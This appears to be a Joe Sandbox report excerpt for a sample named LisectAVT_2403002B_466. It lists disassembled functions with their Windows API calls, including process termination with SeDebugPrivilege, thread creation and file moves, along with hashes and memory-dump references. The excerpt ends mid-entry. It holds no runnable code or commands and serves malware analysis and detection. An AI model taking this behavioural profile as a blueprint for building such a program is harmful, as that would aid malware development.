Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: d3729898fb9b9c65d5522bffd253c3a9671b73c07f290ccfcfa2560c52cb7bee
Instruction ID: bd889f5d27c49dcff5dff9b3b9322971db8bb1f225c0a71cb0887f07849a3501
Opcode Fuzzy Hash: d3729898fb9b9c65d5522bffd253c3a9671b73c07f290ccfcfa2560c52cb7bee
Instruction Fuzzy Hash: 5CE1C831604301DFCB14EF24D491B6ABBE1BF85354F14A56DF899AB2A2DB31EC44CB52

Function 00E84F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E838D3,?), ref: 00E848C7

Part of subcall function 00E848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E838D3,?), ref: 00E848E0

Part of subcall function 00E84CD3: GetFileAttributesW.KERNEL32(?,00E83947), ref: 00E84CD4

lstrcmpiW.KERNEL32(?,?), ref: 00E84FE2
_wcscmp.LIBCMT ref: 00E84FFC
MoveFileW.KERNEL32(?,?), ref: 00E85017

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: f1f201cb2c710c8bd959635fa3637b141b69f81531d1ffc3727844070e1e8a6a
Instruction ID: 6cbdf9fb44ef983f64d069329d3317b8badc67ab1e7cc423ebc09d0680679e37
Opcode Fuzzy Hash: f1f201cb2c710c8bd959635fa3637b141b69f81531d1ffc3727844070e1e8a6a
Instruction Fuzzy Hash: D75165B21087859BD724EBA0D8819DFB3DCEF85340F40592EF28DE3191EE74A58C8766

Function 00EA88B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EA896E

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3b39676a5cd106e57bb6f582858209e40d061d4d0c25d345aaa0ff203f04189b
Instruction ID: e924d3bb1e72e3343a06bd4d808802f5e42614d36d78f51f26ac4468c445faeb
Opcode Fuzzy Hash: 3b39676a5cd106e57bb6f582858209e40d061d4d0c25d345aaa0ff203f04189b
Instruction Fuzzy Hash: C651A130600208BFDF249F25CE89BAA7BA5BF0E354F606116F515FE1A1DF75B9848B81

Function 00E22B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00E5C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E5C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E5C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00E5C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E5C5C0
DestroyIcon.USER32(00000000), ref: 00E5C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E5C5EC
DestroyIcon.USER32(?), ref: 00E5C5FB

Part of subcall function 00EAA71E: DeleteObject.GDI32(00000000), ref: 00EAA757

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 79f803c5657750b19e8ec9edfe333cbb25e315341667f54dcc6cee38ac3d0636
Instruction ID: 285c5732d3041096668a153ce8bcd894611a08d2f21b0bdde9e9c49beabf97c1
Opcode Fuzzy Hash: 79f803c5657750b19e8ec9edfe333cbb25e315341667f54dcc6cee38ac3d0636
Instruction Fuzzy Hash: E1517870600309AFDB24DF65DC45BAA77F5EB58355F201528FA06BB2A0DB70ED84DB50

Function 00E78E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E78A84,00000B00,?,?), ref: 00E78E0C
HeapAlloc.KERNEL32(00000000,?,00E78A84,00000B00,?,?), ref: 00E78E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E78A84,00000B00,?,?), ref: 00E78E28
GetCurrentProcess.KERNEL32(?,00000000,?,00E78A84,00000B00,?,?), ref: 00E78E30
DuplicateHandle.KERNEL32(00000000,?,00E78A84,00000B00,?,?), ref: 00E78E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E78A84,00000B00,?,?), ref: 00E78E43
GetCurrentProcess.KERNEL32(00E78A84,00000000,?,00E78A84,00000B00,?,?), ref: 00E78E4B
DuplicateHandle.KERNEL32(00000000,?,00E78A84,00000B00,?,?), ref: 00E78E4E
CreateThread.KERNEL32(00000000,00000000,00E78E74,00000000,00000000,00000000), ref: 00E78E68

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 96a6834ade0cd014cd7de58c69ce4a9b8b7f4bd006b85a32851cd345bfecbb5c
Instruction ID: d46cee6ea163c45f624f9f4db4653e91dcdfb56c5f0cf42b31a8dcb121226a0d
Opcode Fuzzy Hash: 96a6834ade0cd014cd7de58c69ce4a9b8b7f4bd006b85a32851cd345bfecbb5c
Instruction Fuzzy Hash: E801BF75641304FFE750ABA5DC4DF573B6CEB99711F004461FA05EB1A2DA70E804CB20

Function 00E99A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00E77652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?,?,00E7799D), ref: 00E7766F
Part of subcall function 00E77652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?), ref: 00E7768A
Part of subcall function 00E77652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?,?), ref: 00E77698
Part of subcall function 00E77652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E7758C,80070057,?), ref: 00E776A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00E99B1B
_memset.LIBCMT ref: 00E99B28
_memset.LIBCMT ref: 00E99C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00E99C97
CoTaskMemFree.OLE32(?), ref: 00E99CA2

Strings

NULL Pointer assignment, xrefs: 00E99CF0

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: e6445d3a8e22b6fd5c60788dbde6e40c323110eb672e5207bde4e5161cce824b
Instruction ID: 86ff3a0e570105d8d893e2316ea48a049cb5586279f472744a7cbc552130d80b
Opcode Fuzzy Hash: e6445d3a8e22b6fd5c60788dbde6e40c323110eb672e5207bde4e5161cce824b
Instruction Fuzzy Hash: A1912971D00229ABDF10DFA5DC85ADEBBB9EF08710F20515AF519B7281DB719A44CFA0

Function 00EA6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EA7093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00EA70A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EA70C1
_wcscat.LIBCMT ref: 00EA711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00EA7133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EA7161

Strings

SysListView32, xrefs: 00EA7065

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: ffcb505d0c5970f61dd38ac035c9430397bd8f91038320573fa2d3e2a47a951e
Instruction ID: ad9ab03b08f672e50f36c0c519f6c3c6ac7083fcfa0cf0c57412e7c66849d215
Opcode Fuzzy Hash: ffcb505d0c5970f61dd38ac035c9430397bd8f91038320573fa2d3e2a47a951e
Instruction Fuzzy Hash: E7418071A04308AFDB21DFA4CC85BEA77E8EF0D354F10556AF984BB292D771AD848B50

Function 00E9EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00E83E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00E83EB6
Part of subcall function 00E83E91: Process32FirstW.KERNEL32(00000000,?), ref: 00E83EC4
Part of subcall function 00E83E91: CloseHandle.KERNEL32(00000000), ref: 00E83F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E9ECB8
GetLastError.KERNEL32 ref: 00E9ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E9ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E9ED77
GetLastError.KERNEL32(00000000), ref: 00E9ED82
CloseHandle.KERNEL32(00000000), ref: 00E9EDB7

Strings

SeDebugPrivilege, xrefs: 00E9ECD6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 98212c5370a305a3d49299e97931221c2a8e22ea51b1457d7bdc1f5ad884375c
Instruction ID: c62b73d2f806ba5cebd60b3461bf06bf8cdb2511c43364477b94293d66fee13a
Opcode Fuzzy Hash: 98212c5370a305a3d49299e97931221c2a8e22ea51b1457d7bdc1f5ad884375c
Instruction Fuzzy Hash: 0341AD716002109FDB14EF24CC95F6EB7E1AF85714F089459F946BB3C2DB75A808CB92

Function 00E83226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00E832C5

Strings

stop, xrefs: 00E83296
question, xrefs: 00E8327E
info, xrefs: 00E83266
warning, xrefs: 00E832AE
blank, xrefs: 00E83247

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 1d38be0652c8f37b4293f1dbdde2f47c8aadd5abe8f1280b49f78ac4742dbd4c
Instruction ID: 112a99fa37f5e7052665bcd8e231ce1f2092272e0f3dfaa73ce23b356b59c500
Opcode Fuzzy Hash: 1d38be0652c8f37b4293f1dbdde2f47c8aadd5abe8f1280b49f78ac4742dbd4c
Instruction Fuzzy Hash: 7C112B312493467AA7016B75EC42CAAB3DCDF19B74F20102BF50CB62D2E6655B4147A5

Function 00E84534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E8454E
LoadStringW.USER32(00000000), ref: 00E84555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E8456B
LoadStringW.USER32(00000000), ref: 00E84572
_wprintf.LIBCMT ref: 00E84598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E845B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E84593

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 84eaf5e8405174c65953e64a482bcd73567d5487f85f9cf64ad55a698531d424
Instruction ID: b0a752e6254ffbc73c433b2628f3e5670cb9c487c87b83ed7a9443f01cea3348
Opcode Fuzzy Hash: 84eaf5e8405174c65953e64a482bcd73567d5487f85f9cf64ad55a698531d424
Instruction Fuzzy Hash: D4014FF2940208BFE750A7E19D89EEB776CD709301F0005A5FB49F2052EA74AE898B74

Function 00EAD74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

GetSystemMetrics.USER32(0000000F), ref: 00EAD78A
GetSystemMetrics.USER32(0000000F), ref: 00EAD7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EAD9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EADA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EADA24
ShowWindow.USER32(00000003,00000000), ref: 00EADA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00EADA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00EADA8B

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 57db9131256992f6882a57a508c8e91b47300f1cc4b3a17a3e782adca5ffc6c8
Instruction ID: e5f6ef3c051479ca0e0916e39b8ab207d91c67f5a666062dbfc46274837a6636
Opcode Fuzzy Hash: 57db9131256992f6882a57a508c8e91b47300f1cc4b3a17a3e782adca5ffc6c8
Instruction Fuzzy Hash: E0B1DA71604215EFDF18CF69C8C47BE7BB1BF4A304F089069EC4AAE695D730A950CB90

Function 00E22A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E5C417,00000004,00000000,00000000,00000000), ref: 00E22ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E5C417,00000004,00000000,00000000,00000000,000000FF), ref: 00E22B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E5C417,00000004,00000000,00000000,00000000), ref: 00E5C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E5C417,00000004,00000000,00000000,00000000), ref: 00E5C4D6

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 447e37910b05ec0ef7147229d21b847519e0bc470a2c8630c79e8061aeb7bc7f
Instruction ID: 72b3baf30e9703cf428bae3f273ff50f13c4e1e6a788a7ef41cb8820093725ca
Opcode Fuzzy Hash: 447e37910b05ec0ef7147229d21b847519e0bc470a2c8630c79e8061aeb7bc7f
Instruction Fuzzy Hash: 344141702047D0BEC7354F29EC98BBB3BD1BB86304F24A82DE75776960C675A849D710

Function 00E87368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00E8737F

Part of subcall function 00E40FF6: std::exception::exception.LIBCMT ref: 00E4102C
Part of subcall function 00E40FF6: __CxxThrowException@8.LIBCMT ref: 00E41041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E873B6
EnterCriticalSection.KERNEL32(?), ref: 00E873D2
_memmove.LIBCMT ref: 00E87420
_memmove.LIBCMT ref: 00E8743D
LeaveCriticalSection.KERNEL32(?), ref: 00E8744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E87461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00E87480

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: a3760f0e75a3a510f1e3c06d1107f821153b8c09e1b73380a281f543ba163fe7
Instruction ID: 7398167789a1284c83f1cb0c115dcc4c96d3daef6d0a9565fd0a136d156aeee2
Opcode Fuzzy Hash: a3760f0e75a3a510f1e3c06d1107f821153b8c09e1b73380a281f543ba163fe7
Instruction Fuzzy Hash: 0B318131A04205EFCF10EFA5DC85AAE7BB8EF49710B1441B5F904BB256DB70DA54DBA0

Function 00EA6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EA645A
GetDC.USER32(00000000), ref: 00EA6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA646D
ReleaseDC.USER32(00000000,00000000), ref: 00EA6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EA64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EA64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EA9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00EA6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EA6520

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 11782e118f94474f3edfb129fc511b312206453be2ba2613700671242aba7b14
Instruction ID: 3e0e902f08565c34b49eeb85f40b6466b33f1fcde40de867b877d2942ede2374
Opcode Fuzzy Hash: 11782e118f94474f3edfb129fc511b312206453be2ba2613700671242aba7b14
Instruction Fuzzy Hash: 29318F72101210BFEB108F51CC89FEA3FA9EF4E765F080065FE08AE191C675AC41CBA4

Function 00E7C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00E7C087
_memcmp.LIBCMT ref: 00E7C0A9
_memcmp.LIBCMT ref: 00E7C0C1
_memcmp.LIBCMT ref: 00E7C0D4
_memcmp.LIBCMT ref: 00E7C0EE
_memcmp.LIBCMT ref: 00E7C101
_memcmp.LIBCMT ref: 00E7C119
_memcmp.LIBCMT ref: 00E7C134

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 3403a54fb48b36a475392868320c38c9b9f4544348262c69705ea9a03a03810f
Instruction ID: 46b9b7e4996c9532acf7a5a1d1e511b81f3737e5324f21c25461e6a87e9a4730
Opcode Fuzzy Hash: 3403a54fb48b36a475392868320c38c9b9f4544348262c69705ea9a03a03810f
Instruction Fuzzy Hash: 5821C261601205BBD610A520AC42FFB27ACAF10398F68A06CFE0DB6287F751DE1186E6

Function 00E8ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00E29997: __itow.LIBCMT ref: 00E299C2
Part of subcall function 00E29997: __swprintf.LIBCMT ref: 00E29A0C

Part of subcall function 00E3FEC6: _wcscpy.LIBCMT ref: 00E3FEE9

_wcstok.LIBCMT ref: 00E8EEFF
_wcscpy.LIBCMT ref: 00E8EF8E
_memset.LIBCMT ref: 00E8EFC1

Strings

X, xrefs: 00E8EFFE

Memory Dump Source

